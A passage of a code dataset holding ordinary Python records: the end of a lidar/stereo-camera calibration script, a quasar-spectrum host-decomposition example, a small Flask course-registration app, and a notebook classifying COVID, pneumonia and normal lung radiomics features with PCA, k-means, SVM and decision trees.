type=float)\n parser.add_argument(\"-ymin\", \"--y_minimum\", help=\"Minimum value for cropping in y-direction\",\n default=-1.5, type=float)\n parser.add_argument(\"-ymax\", \"--y_maximum\", help=\"Maximum value for cropping in y-direction\",\n default=2, type=float)\n parser.add_argument(\"-zmin\", \"--z_minimum\", help=\"Minimum value for cropping in z-direction\",\n default=-1, type=float)\n parser.add_argument(\"-zmax\", \"--z_maximum\", help=\"Maximum value for cropping in z-direction\",\n default=1, type=float)\n parser.add_argument(\"-l\", \"--length\", help=\"Length of the packet\", default=0.45, type=float)\n parser.add_argument(\"-w\", \"--width\", help=\"Width of the packet\", 
default=0.35, type=float)\n parser.add_argument(\"-he\", \"--height\", help=\"Height of the packet\", default=0.4, type=float)\n parser.add_argument(\"-p\", \"--path\", help=\"path to data\", default=\"\", type=str)\n args = parser.parse_args()\n debug = args.debug\n \"\"\"\n Lidar Data, have to be changed\n \"\"\"\n # lidar = [\"data/stuhl.pcd\"]\n\n # object_lidar = [\"data/packet.pcd\"]\n\n # \"\"\"\n # Stereo Data, have to be changed\n # \"\"\"\n # stereo = [\"data/stuhl.txt\"]\n # object_stereo = [\"data/packet.txt\"]\n if args.path == \"\":\n lidar = [\"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/lidar_empty.txt\", \"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/lidar_empty.txt\"]\n object_lidar = [\"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/lidar_ob_1.txt\", \"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/lidar_ob_2.txt\"]\n\n stereo = [\"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/stereo_empty.txt\", \"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/stereo_empty.txt\"]\n object_stereo = [\"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/stereo_ob_1.txt\", \"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/stereo_ob_2.txt\"]\n else:\n lidar_path = os.path.join(args.path, \"lidar\")\n lidar_elements = sorted(os.listdir(lidar_path))\n object_lidar = []\n for i in range(1, len(lidar_elements)):\n object_lidar.append(os.path.join(lidar_path, lidar_elements[i]))\n lidar = []\n for i in range(len(lidar_elements)-1):\n lidar.append(os.path.join(lidar_path, lidar_elements[0]))\n\n stereo_path = os.path.join(args.path, \"stereo\")\n stereo_elements = sorted(os.listdir(stereo_path))\n object_stereo = []\n for i in range(1, len(stereo_elements)):\n object_stereo.append(os.path.join(stereo_path, stereo_elements[i]))\n stereo = []\n for i in range(len(stereo_elements)-1):\n stereo.append(os.path.join(stereo_path, stereo_elements[0]))\n\n\n s_all_l = s_all_s = inliers_l = inliers_s = np.empty((0, 3))\n for i in range(len(lidar)):\n \"\"\"\n Read Data\n \"\"\"\n print(\"Read data from\", lidar[i])\n file_lidar = o3d.io.read_point_cloud(lidar[i], format='xyz')\n print(\"Read data from\", object_lidar[i])\n file_object_lidar = o3d.io.read_point_cloud(object_lidar[i], format='xyz')\n print(\"Read data from\", stereo[i])\n file_stereo = o3d.io.read_point_cloud(stereo[i], format='xyzrgb')\n print(\"Read data from\", object_stereo[i])\n file_object_stereo = o3d.io.read_point_cloud(object_stereo[i], format='xyzrgb')\n\n \"\"\" Cropping of data if necessary \"\"\"\n crop = [args.x_minimum, args.x_maximum, args.y_minimum, args.y_maximum, args.z_minimum, args.z_maximum]\n\n \"\"\"\n remove_points can be changed to remove_points_extended for cropping of x, y and z axles\n \"\"\"\n file_lidar = remove_points_extended(file_lidar, crop)\n file_object_lidar = remove_points_extended(file_object_lidar, crop)\n\n \"\"\"\n Transform Stereodata to Lidar coordinate system\n \"\"\"\n file_stereo_t = transform_stereo(file_stereo)\n file_object_stereo_t = transform_stereo(file_object_stereo)\n\n file_stereo_c = remove_points_extended(file_stereo_t, crop)\n file_object_stereo_c = remove_points_extended(file_object_stereo_t, crop)\n\n \"\"\" Run main on Lidar and Stereo \"\"\"\n s_all_l_, inliers_l_ = main(file_lidar, file_object_lidar, args.distance_lidar,\n \"Lidar\", args.ransac_lidar, 
args.length, args.width, args.height)\n s_all_l = np.append(s_all_l, s_all_l_, axis=0)\n inliers_l = np.append(inliers_l, inliers_l_, axis=0)\n print(\"Lidar finished\")\n s_all_s_, inliers_s_ = main(file_stereo_c, file_object_stereo_c, args.distance_stereo,\n \"Stereo\", args.ransac_stereo, args.length, args.width, args.height)\n s_all_s = np.append(s_all_s, s_all_s_, axis=0)\n inliers_s = np.append(inliers_s, inliers_s_, axis=0)\n print(\"Stereo finished\")\n\n \"\"\"\n Show point clouds before icp\n \"\"\"\n if debug:\n inliers1_l = getTrace(inliers_l[:, 0], inliers_l[:, 1], inliers_l[:, 2], s=4, label=\"Lidar\", c=\"green\")\n inliers1_s = getTrace(inliers_s[:, 0], inliers_s[:, 1], inliers_s[:, 2], s=4, label=\"Stereo\", c=\"orange\")\n\n schnittpunkt1l = getTrace(s_all_l[:, 0], s_all_l[:, 1], s_all_l[:, 2], s=6, c='blue',\n label=f'S: Lidar')\n\n schnittpunkt1s = getTrace(s_all_s[:, 0], s_all_s[:, 1], s_all_s[:, 2], s=6, c='red',\n label=f'S: Stereo')\n showGraph(\n \"Point Clouds\",\n \"Z\", \"X\", \"Y\",\n [schnittpunkt1l, inliers1_l,\n schnittpunkt1s, inliers1_s])\n\n \"\"\" Compute center of mass and singular value decomposition \"\"\"\n rotation, translation = icp(s_all_l, s_all_s)\n \"\"\" Allign Stereo data to lidar data \"\"\"\n inliers_s = point_alignments(rotation, translation, inliers_s)\n s_all_s = point_alignments(rotation, translation, s_all_s)\n\n \"\"\" Get euclidean distance between intersections \"\"\"\n geteuclideandistance(s_all_s, s_all_l)\n\n \"\"\"\n Show point clouds after icp\n \"\"\"\n if debug:\n l1, l2, l3 = drawIntersectionLines(s_all_l, \"Lidar\", \"lightsteelblue\")\n s1, s2, s3 = drawIntersectionLines(s_all_s, \"Stereo\", \"salmon\")\n \"\"\" Build trace for plotly \"\"\"\n inliers_l = getTrace(inliers_l[:, 0], inliers_l[:, 1], inliers_l[:, 2], s=4, label=\"Lidar\", c=\"green\")\n inliers_s = getTrace(inliers_s[:, 0], inliers_s[:, 1], inliers_s[:, 2], s=4, label=\"Stereo\", c=\"orange\")\n\n schnittpunkt1l = getTrace(s_all_l[:, 0], s_all_l[:, 1], s_all_l[:, 2], s=6, c='blue',\n label=f'S: Lidar')\n\n schnittpunkt1s = getTrace(s_all_s[:, 0], s_all_s[:, 1], s_all_s[:, 2], s=6, c='red',\n label=f'S: Stereo')\n\n showGraph(\n \"Point Clouds aligned\",\n \"Z\", \"X\", \"Y\",\n [schnittpunkt1l, inliers_l,\n schnittpunkt1s, inliers_s,\n l1, l2, l3,\n s1, s2, s3])\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"madeberl/lidar_stereocamera_calibration","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29413232422","text":"# Example\nimport hostDecomp\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\nfile = 'data/decomp_test.csv'\ntest = hostDecomp.HostDecomp(file, 0.1)\n\nparams = test.run()\n\npdata = pd.read_csv(file)\nlams, flux, eflux = pdata['Wavelength'], pdata['Flux'], pdata['eFlux']\nfig, ax = plt.subplots()\nax.plot(lams, flux, label='Data')\n\nfile = 'data/hostDecomp/decomp_test.csv'\npdata = pd.read_csv(file)\nlams, flux, eflux = pdata['Wavelength'], pdata['Flux'], pdata['eFlux']\nax.plot(lams, flux, label='QSO')\n\nax.plot(lams, test.evalQSOGen(params, np.array(lams)).flux, label='Model')\nax.plot(lams, test.evalQSOGen(params, np.array(lams)).host_galaxy_flux, label='Host')\nax.set_xlabel('Wavelength ($\\\\AA$)')\nax.set_ylabel('Flux Density per 
Angstrom')\nax.legend()\nplt.show()","repo_name":"samlaihei/PyQSpecFit","sub_path":"hostDecomp_test.py","file_name":"hostDecomp_test.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36694475916","text":"import os\nimport sqlite3\nimport time\nfrom flask import Flask, request, session, g, redirect, url_for, abort, \\\n render_template, flash\n##import database \n\napp = Flask(__name__)\n\n# Load default config and override config from an environment variable\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'flaskr.db'),\n SECRET_KEY='development key',\n))\n\napp.config.from_envvar('FLASKR_SETTINGS', silent=True) \n\n\ndef connect_db():\n \"\"\"Connects to the specific database.\"\"\"\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv\n\n\ndef get_db():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\n@app.teardown_appcontext\ndef close_db(error):\n \"\"\"Closes the database again at the end of the request.\"\"\"\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\ndef init_db():\n db = get_db()\n with app.open_resource('tables.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n\n@app.cli.command('initdb')\ndef initdb_command():\n \"\"\"Initializes the database.\"\"\"\n init_db()\n print('Initialized the database.')\n\n\n\n\n@app.route('/')\ndef index():\n db = get_db()\n cur = db.execute('SELECT * FROM COURSE')\n courses = cur.fetchall()\n return render_template(\"index.html\", courses=courses) \n\n\n@app.route('/totallyreallogin', methods=['POST'])\ndef reallogin():\n return redirect(url_for('home')) \n\n \n@app.route('/homepage')\ndef home():\n db = get_db()\n cur = db.execute('SELECT * FROM COURSE')\n courses = cur.fetchall()\n return render_template(\"homepage.html\", courses=courses)\n \n\n\n\n@app.route('/Registration.html')\ndef registration():\n db = get_db()\n cur = db.execute('SELECT * FROM COURSE')\n courses = cur.fetchall()\n return render_template(\"Registration.html\", courses=courses)\n\n\n@app.route('/Schedule1')\ndef schedule():\n db = get_db()\n cur = db.execute('SELECT REGISTRATION.SEM_ID, REGISTRATION.STU_ID, COURSE.CRS_ID, COURSE.CRS_NAME FROM REGISTRATION INNER JOIN COURSE ON COURSE.CRS_ID = REGISTRATION.CRS_ID WHERE REGISTRATION.SEM_ID = \"FA2020\" AND REGISTRATION.STU_ID = 02837732;') \n courses = cur.fetchall()\n return render_template(\"Registration.html\", courses=courses)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n app.run()\n \n","repo_name":"macayajones32/SAD_FinalProject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24931654761","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport torch\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom PIL import Image \nfrom sklearn import metrics\nimport scipy.stats as stats\nfrom sklearn.svm import SVC\nimport matplotlib.pyplot as plt\nfrom scipy.stats import ks_2samp\nfrom sklearn.cluster import KMeans\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.decomposition import PCA\nfrom skimage.io import imread, imshow\nfrom sklearn.model_selection import KFold\nfrom 
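sklearn.metrics import RocCurveDisplay\n# NOTE: plot_roc_curve (imported below) was deprecated in scikit-learn 1.0 and removed\n# in 1.2; RocCurveDisplay.from_estimator is its replacement on newer versions.\nfrom 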
sklearn.metrics import accuracy_score, plot_roc_curve\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import label_binarize\nfrom itertools import combinations, permutations\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import cross_val_score\n# from sklearn.model_selection import RepeatedStratifiedKFold\nfrom sklearn.metrics import f1_score, roc_auc_score, roc_curve, auc\n\n\n# In[2]:\n\n\ncovid_path = '/Users/deangao/Desktop/CSM226/covidProject_data/covid/augmented/images/'\nnorm_path = '/Users/deangao/Desktop/CSM226/covidProject_data/normal/'\npneu_path = '/Users/deangao/Desktop/CSM226/covidProject_data/pneumonia/'\n\n\n# In[3]:\n\n\n# covid_imgs = []\n# for p in os.listdir(covid_path):\n# # img = Image.open(covid_path + 'images/' + p)\n# covid_imgs.append(p)\n# # print(p)\n\n# c_pixels = []\n# for c_img in covid_imgs:\n# print(c_img)\n# data = imread(c_img, as_gray=True)\n# c_pixels.append(data)\n\n\n# In[4]:\n\n\nimg_train = pd.read_csv('/Users/deangao/Desktop/CSM226/covidProject_data/radiomics/train_covid_normal_pn.csv')\nimg_test = pd.read_csv('/Users/deangao/Desktop/CSM226/covidProject_data/radiomics/test_covid_normal_pn.csv')\nall_data = pd.concat([img_train, img_test], axis=0)\n\nimg_train = img_train.drop(columns=['id', 'Entropy', 'Uniformity', 'Energy'])\nimg_test = img_test.drop(columns=['id', 'Entropy', 'Uniformity', 'Energy'])\nall_data = all_data.drop(columns=['id', 'Entropy', 'Uniformity', 'Energy'])\n\n\n# In[5]:\n\n\ntrain_X, train_y = img_train.iloc[:, :-1], img_train.iloc[:, -1]\ntest_X, test_y = img_test.iloc[:, :-1], img_test.iloc[:, -1]\nlabels = {0: 'normal lung', 1: 'pneumonia lung', 2: 'covid lung'}\n\nscaler = MinMaxScaler()\nscaled_data = scaler.fit_transform(train_X)\n\nscaler2 = MinMaxScaler()\nscaled_all = scaler2.fit_transform(all_data.iloc[:, :-1])\nscaled_all_data = pd.concat([pd.DataFrame(all_data.iloc[:, -1].reset_index()), pd.DataFrame(scaled_all, columns=train_X.columns)], axis=1)\nscaled_all_data = scaled_all_data.drop(['index'], axis=1)\n\n\n# In[6]:\n\n\nall_data.shape\nall_data.iloc[:, -1]\npd.DataFrame(scaled_all)\n# pd.DataFrame(all_data.iloc[:, -1])\n# pd.concat([pd.DataFrame(all_data.iloc[:, -1]), pd.DataFrame(scaled_all)], axis=1)\nscaled_all_data\n\n\n# In[7]:\n\n\ndef flag_different_distributions(img_train):\n combos = combinations([0, 1, 2], 2)\n for i in range(img_train.shape[1]-1):\n feature = img_train.iloc[:, [i, -1]]\n for c in combos:\n stat, p = ks_2samp(feature[feature.label==c[0]].iloc[:, i], feature[feature.label==c[1]].iloc[:, i])\n if p < 0.05:\n print(f'There is a significantly different distribution between {labels[c[0]]} and {labels[c[1]]}, on the feature {img_train.iloc[:, i].name}')\n\n\n# In[8]:\n\n\ndef plot_distributions(img_train):\n '''\n Distributions for each of the features, grouped by normal, pneumonia, and covid\n '''\n for i in range(img_train.shape[1]-1):\n for j in range(3):\n x = img_train[img_train.label==j]\n sns.displot(data = x, x = img_train.iloc[:, i].name)\n plt.title(f'{labels[j]}')\n\n\n# In[9]:\n\n\ndef calc_ANOVA(df):\n '''\n Uses pairwise tests to test against the null hypothesis that there is NO significant difference between means of groups\n '''\n for i in range(df.shape[1]-1):\n stat, p = stats.f_oneway(df.iloc[:, i][df.iloc[:, -1] == 0], df.iloc[:, i][df.iloc[:, -1] == 1], df.iloc[:, i][df.iloc[:, -1] == 2])\n if p < 0.05/3:\n 
print(f'There is a statistically significant difference in means between classes on feature {df.iloc[:, i].name}, with p-value = {np.format_float_scientific(p)}')\n else:\n print(f'There is no statistically significant difference in means between classes on feature {df.iloc[:, i].name}, with p-value = {np.format_float_scientific(p)}')\n\n\n# In[10]:\n\n\ndef calc_PCA(X, n, test_X):\n scaler = MinMaxScaler()\n scaled_train = scaler.fit_transform(X)\n scaled_test = scaler.fit_transform(test_X)\n# idx = X.shape[1]\n pca = PCA(n_components = n)\n pca_scores = pca.fit_transform(scaled_train)\n test_pca = pca.transform(scaled_test)\n pca_df = pd.DataFrame(data = pca_scores, columns = [f'PC{i+1}' for i in range(n)])\n return pca, pca_df, test_pca\n\n\n# In[11]:\n\n\ndef plot_2d_PCA(pc_df, labels, hue):\n df = pd.concat([pc_df, labels], axis=1)\n# sns.set_palette(sns.color_palette('Paired'))\n sns.scatterplot(data = df, x = df.PC1, y = df.PC2, hue = hue)\n\n\n# In[12]:\n\n\ndef compute_error(model, X, y, X_test, y_test):\n kf = KFold(n_splits=5)\n kf.get_n_splits(X)\n X = np.array(X)\n y = np.array(y)\n train_errors = 0\n valid_errors = 0\n for train_index, valid_index in kf.split(X):\n X_train, X_valid = X[train_index], X[valid_index]\n y_train, y_valid = y[train_index], y[valid_index]\n mod = model.fit(X_train, y_train)\n train_preds = mod.predict(X_train)\n valid_preds = mod.predict(X_valid)\n train_error = 1 - metrics.accuracy_score(y_train, train_preds, normalize=True)\n train_errors += train_error\n valid_preds = mod.predict(X_valid)\n valid_error = 1 - metrics.accuracy_score(y_valid, valid_preds, normalize=True)\n train_errors += train_error\n valid_errors += valid_error\n y_test_preds = mod.predict(X_test)\n f1 = f1_score(y_test, y_test_preds, average='weighted')\n test_error = 1 - metrics.accuracy_score(y_test, y_test_preds, normalize=True)\n avg_train_error = train_errors/5\n avg_valid_error = valid_errors/5\n return avg_train_error, avg_valid_error, test_error, f1, y_test_preds\n\n\n# In[13]:\n\n\n# plot_distributions(img_train)\ncalc_ANOVA(img_train)\ny = []\nx = [n for n in range(1, train_X.shape[1])]\nfor n in range(1, train_X.shape[1]):\n pca, pca_df1, test_X_PCA = calc_PCA(train_X, n, test_X)\n y.append(np.cumsum(pca.explained_variance_ratio_)[-1])\n print(np.cumsum(pca.explained_variance_ratio_))\n \n# Plots the first two PCA components \npc2, pc_df, test_X_PCA2 = calc_PCA(train_X, 2, test_X)\ny_labeled = train_y.replace({0: 'normal', 1: 'pneumonia', 2: 'covid'})\nplot_2d_PCA(pc_df, pd.DataFrame(y_labeled), 'label')\n\n# Appends the four selected PCA components to the original X dataframe\n# pc4, pc_df4 = calc_PCA(scaled_data, 4)\n# train_X = pd.concat([train_X, pc_df4], axis=1)\ntrain_X\n\n\n# In[14]:\n\n\n# Plots num of PCA components against variance explained\nplt.plot(x, y)\nplt.xlabel('PCA Components')\nplt.ylabel('Variance Explained')\nplt.show()\n\n\n# In[15]:\n\n\n'''\nCovariance and Correlation\n'''\ncov_matrix = np.cov(train_X.T)\ncorrelation_matrix = train_X.corr()\n\nfor i in range(correlation_matrix.values.shape[0]):\n for j in range(correlation_matrix.values.shape[1]):\n if i != j:\n if correlation_matrix.values[i, j] > 0.9:\n print(f'There is a significant correlation ({correlation_matrix.values[i, j]}) between {train_X.columns[j]} and {train_X.columns[i]}')\n \n\n\n# In[16]:\n\n\nscaled_all_data.shape\n\n\n# In[17]:\n\n\n'''\nKMeans\n'''\n# Fits a KMeans model with three cluster groups and appends the predicted labels to the original labels frame (for 
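comparison).\n# NOTE: k-means cluster ids are arbitrary (cluster 0 need not be class 0), so the direct\n# label comparison below understates agreement unless each cluster is first mapped to\n# its best-matching class (e.g. by majority vote per cluster).\n# (for 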
comparison)\nfeatures_to_use = ['Kurtosis', 'MeanAbsoluteDeviation', 'Mean', 'Range', 'RootMeanSquared', 'Skewness', 'TotalEnergy', 'Variance']\nX_to_fit = [idx for idx in range(len(scaled_all_data.columns)) if scaled_all_data.columns[idx] in features_to_use] \n# for i in range(len(X_to_fit)):\n# X_to_fit[i] += 1\nX_to_fit = [4, 6, 7, 10, 12, 13, 14, 15]\nkmeans = KMeans(n_clusters=3).fit(scaled_all_data.iloc[:, X_to_fit])\ndf_kmeans = pd.concat([pd.DataFrame(kmeans.labels_, columns=['KMeans']), pd.DataFrame(scaled_all_data)], axis=1)\nnum_errors = df_kmeans[df_kmeans.label != df_kmeans.KMeans].shape[0]\naccuracy = 1 - num_errors/df_kmeans.shape[0]\nprint(f\"KMeans model has {accuracy} accuracy\")\n\n\nplot_2d_PCA(pc_df, pd.DataFrame(df_kmeans.KMeans), 'KMeans')\n\n# AUC ROC\n# kmeans_dummy = pd.get_dummies(pd.DataFrame(df_kmeans.iloc[:, 0]), columns=[0])\n# kmeans_true = df_kmeans.iloc[:, 1]\nk_labels = df_kmeans[['KMeans', 'label']]\nk_accuracy = metrics.accuracy_score(k_labels.label, k_labels.KMeans, normalize=True)\nf1_k = f1_score(k_labels.label, k_labels.KMeans, average='weighted')\nprint(f'The F1 for kmeans is {f1_k}')\nprint(f'The accuracy for kmeans is {k_accuracy}')\n\n\n# In[18]:\n\n\nzeros = df_kmeans[df_kmeans.label == 0]\nones = df_kmeans[df_kmeans.label == 1]\ntwos = df_kmeans[df_kmeans.label == 2]\n\nk_tp_norm = zeros[zeros.KMeans==0].shape[0]\nk_fn_norm = df_kmeans[(df_kmeans.label==0) & (df_kmeans.KMeans != 0)].shape[0]\nsens_k_norm = k_tp_norm/(k_tp_norm+k_fn_norm)\n\nk_tn_norm = df_kmeans[(df_kmeans.label != 0) & (df_kmeans.KMeans != 0)].shape[0]\nk_fp_norm = df_kmeans[(df_kmeans.label != 0) & (df_kmeans.KMeans == 0)].shape[0]\nspec_k_norm = k_tn_norm/(k_tn_norm + k_fp_norm)\nprint(f'For NORMAL the sensitivity is {sens_k_norm}, specificity is {spec_k_norm}')\n\n\n# In[19]:\n\n\nk_tp_pneu = ones[ones.KMeans==1].shape[0]\nk_fn_pneu = df_kmeans[(df_kmeans.label==1) & (df_kmeans.KMeans != 1)].shape[0]\nsens_k_pneu = k_tp_pneu/(k_tp_pneu+k_fn_pneu)\n\nk_tn_pneu = df_kmeans[(df_kmeans.label != 1) & (df_kmeans.KMeans != 1)].shape[0]\nk_fp_pneu = df_kmeans[(df_kmeans.label != 1) & (df_kmeans.KMeans == 1)].shape[0]\nspec_k_pneu = k_tn_pneu/(k_tn_pneu + k_fp_pneu)\nspec_k_pneu\nprint(f'For PNEUMONIA the sensitivity is {sens_k_pneu}, specificity is {spec_k_pneu}')\n\n\n# In[20]:\n\n\nk_tp_covid = twos[twos.KMeans==2].shape[0]\nk_fn_covid = df_kmeans[(df_kmeans.label==2) & (df_kmeans.KMeans != 2)].shape[0]\nsens_k_covid = k_tp_covid/(k_tp_covid+k_fn_covid)\nsens_k_covid\n\nk_tn_covid = df_kmeans[(df_kmeans.label != 2) & (df_kmeans.KMeans != 2)].shape[0]\nk_fp_covid = df_kmeans[(df_kmeans.label != 2) & (df_kmeans.KMeans == 2)].shape[0]\nspec_k_covid = k_tn_covid/(k_tn_covid + k_fp_covid)\nprint(f'For COVID the sensitivity is {sens_k_covid}, specificity is {spec_k_covid}')\nspec_k_covid\n\n\n# In[ ]:\n\n\n'''\nSVM\n'''\n# Fit an SVM using all of the features\n# X = train_X\n# y = train_y\n# m1 = SVC(C=1, kernel='linear', decision_function_shape='ovo').fit(X, y)\n# m1_train_preds = m1.predict(X)\n# m1_test_preds = m1.predict(test_X)\n# m1_decision = m1.decision_function(test_X)\n# m1_score = m1.score(test_X, test_y)\n# m1_f1_train = f1_score(train_y, m1_train_preds, average='weighted')\n# m1_f1_test = f1_score(test_y, m1_test_preds, average='weighted') \n\n# _, X2_train, X2_test = calc_PCA(train_X, 5, test_X)\n# X2_train = X2_train\n# m2 = SVC(C=1, kernel='linear', decision_function_shape='ovo').fit(X2_train, y)\n# m2_train_preds = m2.predict(X2_train)\n# m2_test_preds = 
m2.predict(X2_test)\n# m2_decision = m2.decision_function(X2_test)\n# m2_score = m2.score(X2_test, test_y)\n# m2_f1_train = f1_score(train_y, m2_train_preds, average='weighted')\n# m2_f1_test = f1_score(test_y, m2_test_preds, average='weighted')\n# svm_labels = pd.concat([test_y, pd.DataFrame(m2_test_preds)], axis=1)\n# m2_accuracy = metrics.accuracy_score(svm_labels.label, svm_labels[0], normalize=True)\n# print(f'The F1 for SVM is {m2_f1_test}')\n# print(f'The accuracy for SVM is {m2_accuracy}')\n\ny_train = label_binarize(train_y, classes=[0, 1, 2])\ny_test = label_binarize(test_y, classes=[0, 1, 2])\nn_classes = 3\n\n# Learn to predict each class against the others\nsvm_clf = OneVsRestClassifier(SVC(kernel='linear', probability=True))\n\ny_score = svm_clf.fit(train_X, y_train).decision_function(test_X)\n\n# # Compute ROC curve and ROC area for each class\n# fpr = dict()\n# tpr = dict()\n# roc_auc = dict()\n# for i in range(n_classes):\n# fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])\n# roc_auc[i] = auc(fpr[i], tpr[i])\n\n# # Compute micro-average ROC curve and ROC area\n# fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\n# roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n\n# plt.figure()\n# lw = 2\n# plt.plot(fpr[2], tpr[2], color='darkorange',\n# lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[2])\n# plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n# plt.xlim([0.0, 1.0])\n# plt.ylim([0.0, 1.05])\n# plt.xlabel('False Positive Rate')\n# plt.ylabel('True Positive Rate')\n# plt.title('Receiver operating characteristic example')\n# plt.legend(loc=\"lower right\")\n# plt.show()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[22]:\n\n\n# svm_tp_norm = svm_labels[(svm_labels.label==0) & (svm_labels[0]==0)].shape[0]\n# svm_fn_norm = svm_labels[(svm_labels.label==0) & (svm_labels[0] != 0)].shape[0]\n# sens_svm_norm = svm_tp_norm/(svm_tp_norm + svm_fn_norm)\n\n# svm_tn_norm = svm_labels[(svm_labels.label != 0) & (svm_labels[0] != 0)].shape[0]\n# svm_fp_norm = svm_labels[(svm_labels.label != 0) & (svm_labels[0] == 0)].shape[0]\n# spec_svm_norm = svm_tn_norm/(svm_tn_norm + svm_fp_norm)\n\n# print(f'For NORMAL the sensitivity is {sens_svm_norm}, specificity is {spec_svm_norm}')\n\n\n# In[23]:\n\n\n# svm_tp_pneu = svm_labels[(svm_labels.label==1) & (svm_labels[0]==1)].shape[0]\n# svm_fn_pneu = svm_labels[(svm_labels.label==1) & (svm_labels[0] != 1)].shape[0]\n# sens_svm_pneu = svm_tp_pneu/(svm_tp_pneu + svm_fn_pneu)\n\n# svm_tn_pneu = svm_labels[(svm_labels.label != 1) & (svm_labels[0] != 1)].shape[0]\n# svm_fp_pneu = svm_labels[(svm_labels.label != 1) & (svm_labels[0] == 1)].shape[0]\n# spec_svm_pneu = svm_tn_pneu/(svm_tn_pneu + svm_fp_pneu)\n\n# print(f'For PNEUMONIA the sensitivity is {sens_svm_pneu}, specificity is {spec_svm_pneu}')\n\n\n# In[24]:\n\n\n# svm_tp_covid = svm_labels[(svm_labels.label==2) & (svm_labels[0]==2)].shape[0]\n# svm_fn_covid = svm_labels[(svm_labels.label==2) & (svm_labels[0] != 2)].shape[0]\n# sens_svm_covid = svm_tp_covid/(svm_tp_covid + svm_fn_covid)\n\n# svm_tn_covid = svm_labels[(svm_labels.label != 2) & (svm_labels[0] != 2)].shape[0]\n# svm_fp_covid = svm_labels[(svm_labels.label != 2) & (svm_labels[0] == 2)].shape[0]\n# spec_svm_covid = svm_tn_covid/(svm_tn_covid + svm_fp_covid)\n\n# print(f'For COVID the sensitivity is {sens_svm_covid}, specificity is {spec_svm_covid}')\n\n\n# In[27]:\n\n\n'''\nDecision Tree Classifier\n'''\n# depth = [d for d in range(1,16)]\n# m3_tr_error = []\n# 
m3_val_error = []\n# m3_te_error = []\n# m3_f1_scores = []\n# for i in range(1, 16):\n# m3 = DecisionTreeClassifier(criterion='entropy', max_depth=i, random_state=0)\n# m3_train_error, m3_valid_error, m3_test_error, m3_f1, m3_preds = compute_error(m3, img_train.iloc[:, :-1], img_train.iloc[:, -1], test_X, test_y)\n# # tree_train_preds = pd.DataFrame(m3.predict(train_X.iloc[:, -4:]), columns=['decision_tree'])\n# m3_tr_error.append(m3_train_error)\n# m3_val_error.append(m3_valid_error)\n# m3_te_error.append(m3_test_error)\n# m3_f1_scores.append(m3_f1)\n# if i == 6:\n# m3_tree6 = m3_preds\n# m3_f1_final = m3_f1\n# m3_accuracy = metrics.accuracy_score(test_y, m3_tree6, normalize=True)\n \n# # Plot train and valid error against max tree depth\n# plt.figure()\n# plt.plot(depth, m3_tr_error, label='Training Error')\n# plt.plot(depth, m3_val_error, label='Validation Error')\n# plt.plot(depth, m3_te_error, label='Test Error')\n# plt.legend()\n# plt.xlabel('Tree Depth')\n# plt.ylabel('Average Error')\n# plt.title('Decision Tree Classifier (with original features)')\n# plt.show()\n\n# plt.plot(depth, m3_f1_scores)\n# plt.xlabel('Tree Depth')\n# plt.ylabel('Accuracy (F1 Score)')\n# plt.title('Decision Tree Classifier (with original features)')\n# plt.show()\n\n# # _, test_X_PCA = calc_PCA(test_X, 4)\n# # test_X = pd.concat([test_X, test_X_PCA], axis=1)\n# test_y = pd.DataFrame(test_y)\n# m4_f1_scores = []\n# for comp in range(4, 9):\n# m4_tr_error = []\n# m4_val_error = []\n# m4_te_error = []\n# pca_f1_scores = []\n# _, train_X_PCA, test_X_PCA = calc_PCA(train_X, comp, test_X)\n# # test_X_PCA = pca_gen.transform(test_X)\n# for i in range(1, 16):\n# m4 = DecisionTreeClassifier(criterion='entropy', max_depth=i, random_state=0)\n# m4_train_error, m4_valid_error, m4_test_error, m4_f1, m4_preds = compute_error(m4, train_X_PCA, train_y, test_X_PCA, test_y)\n# m4_tr_error.append(m4_train_error)\n# m4_val_error.append(m4_valid_error)\n# m4_te_error.append(m4_test_error)\n# pca_f1_scores.append(m4_f1)\n# m4_f1_scores.append([pca_f1_scores])\n# # Plot train and valid error against max tree depth\n# plt.figure()\n# 